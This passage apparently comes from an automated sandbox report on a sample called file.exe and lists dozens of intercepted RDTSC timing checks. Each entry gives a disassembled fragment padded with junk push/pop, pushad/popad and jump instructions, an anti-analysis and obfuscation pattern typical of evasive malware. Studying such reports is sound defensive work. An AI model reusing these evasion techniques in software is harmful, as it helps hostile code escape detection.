                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9249A second address: E9249E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9249E second address: E924C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F450CC4AB1Ch 0x0000000e je 00007F450CC4AB16h 0x00000014 js 00007F450CC4AB22h 0x0000001a jl 00007F450CC4AB16h 0x00000020 jng 00007F450CC4AB16h 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E924C8 second address: E924CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E95832 second address: E95836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E95836 second address: E95842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F450CC4A606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E95842 second address: E95847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E95847 second address: E9585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jbe 00007F450CC4A60Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FC14 second address: E1FC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F450CC4AB2Bh 0x0000000b jmp 00007F450CC4AB25h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FC38 second address: E1FC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F450CC4A606h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FC42 second address: E1FC46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1FC46 second address: E1FC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F450CC4A614h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F450CC4A612h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FAAA second address: E9FAC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F450CC4AB1Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FAC0 second address: E9FAC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FAC5 second address: E9FAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB29h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FC1D second address: E9FC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F450CC4A60Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FD80 second address: E9FD9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F450CC4AB24h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FD9C second address: E9FDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FDA0 second address: E9FDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA00A3 second address: EA00A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA00A7 second address: EA00D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F450CC4AB1Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F450CC4AB1Eh 0x00000011 jg 00007F450CC4AB16h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a jc 00007F450CC4AB59h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jns 00007F450CC4AB16h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4605A second address: E4606B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A60Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4606B second address: E4606F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4606F second address: E46079 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46079 second address: E4608F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB22h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4608F second address: E46093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46093 second address: E460A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jl 00007F450CC4AB16h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E460A7 second address: E460AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E460AD second address: E460B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E460B3 second address: E460B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E460B7 second address: E460BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA09A0 second address: EA09C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F450CC4A617h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA09C6 second address: EA09CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA09CE second address: EA09D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA09D5 second address: EA09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F1F3 second address: E9F1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4391 second address: EA43BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F450CC4AB1Fh 0x0000000e jmp 00007F450CC4AB22h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA43BB second address: EA43C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA43C3 second address: EA43D3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4AB22h 0x00000008 jnp 00007F450CC4AB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E643FA second address: E64400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E648C4 second address: E648D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4AB1Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E648D7 second address: E648FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b jmp 00007F450CC4A616h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E64A10 second address: E64A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E64A15 second address: E64A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E64B9B second address: E64BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F450CC4AB16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E64C7E second address: E64C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6517E second address: E6519E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB20h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E652AD second address: E652C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E652C8 second address: E652E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F450CC4AB1Eh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F450CC4AB16h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6559B second address: E6565D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F450CC4A619h 0x00000010 popad 0x00000011 pop edx 0x00000012 nop 0x00000013 or dx, C629h 0x00000018 lea eax, dword ptr [ebp+1248F021h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F450CC4A608h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 pushad 0x00000039 jmp 00007F450CC4A616h 0x0000003e popad 0x0000003f jns 00007F450CC4A620h 0x00000045 nop 0x00000046 je 00007F450CC4A60Eh 0x0000004c push edi 0x0000004d jbe 00007F450CC4A606h 0x00000053 pop edi 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jmp 00007F450CC4A619h 0x0000005d jns 00007F450CC4A606h 0x00000063 popad 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6565D second address: E4605A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F450CC4AB18h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dx, bx 0x00000027 call dword ptr [ebp+122D1A5Bh] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F450CC4AB1Eh 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA76EC second address: EA76F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA76F2 second address: EA7712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F450CC4AB16h 0x0000000a popad 0x0000000b jmp 00007F450CC4AB25h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA7297 second address: EA72CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F450CC4A612h 0x00000008 pop ecx 0x00000009 je 00007F450CC4A619h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F450CC4A611h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA72CE second address: EA72D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA72D2 second address: EA72E6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F450CC4A60Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA72E6 second address: EA72EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA741D second address: EA7421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9E29 second address: EA9E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB22h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9E3F second address: EA9E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9E43 second address: EA9E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9E4B second address: EA9E56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F450CC4A606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9E56 second address: EA9E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9E67 second address: EA9E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4A60Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jne 00007F450CC4A606h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9E8D second address: EA9E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB1Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAA132 second address: EAA178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F450CC4A60Bh 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F450CC4A619h 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F450CC4A60Ah 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADAAA second address: EADAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADAB1 second address: EADAD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A613h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F450CC4A60Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADD73 second address: EADD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAE02E second address: EAE048 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F450CC4A606h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F450CC4A60Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB15A9 second address: EB15AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB15AF second address: EB15D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 jmp 00007F450CC4A611h 0x0000000d jng 00007F450CC4A606h 0x00000013 pop eax 0x00000014 jp 00007F450CC4A60Ah 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1722 second address: EB1735 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1AE3 second address: EB1B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F450CC4A618h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1B05 second address: EB1B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB28h 0x00000010 jmp 00007F450CC4AB1Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1B33 second address: EB1B3D instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4A606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1CB7 second address: EB1CC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F450CC4AB1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1CC1 second address: EB1CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F450CC4A611h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1CDC second address: EB1CF2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F450CC4AB16h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1CF2 second address: EB1D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A615h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1D0B second address: EB1D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB68DD second address: EB68E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB68E1 second address: EB68E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB68E7 second address: EB68F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB68F2 second address: EB68F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB6A58 second address: EB6A62 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB6A62 second address: EB6A7C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F450CC4AB24h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB6A7C second address: EB6A86 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4A606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB74A8 second address: EB74C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB27h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB74C3 second address: EB74C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB74C7 second address: EB74CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15A85 second address: E15A9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A612h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15A9B second address: E15AAC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15AAC second address: E15AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F450CC4A611h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F450CC4A60Eh 0x00000010 jp 00007F450CC4A60Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC116D second address: EC1173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC1173 second address: EC1182 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F450CC4A606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
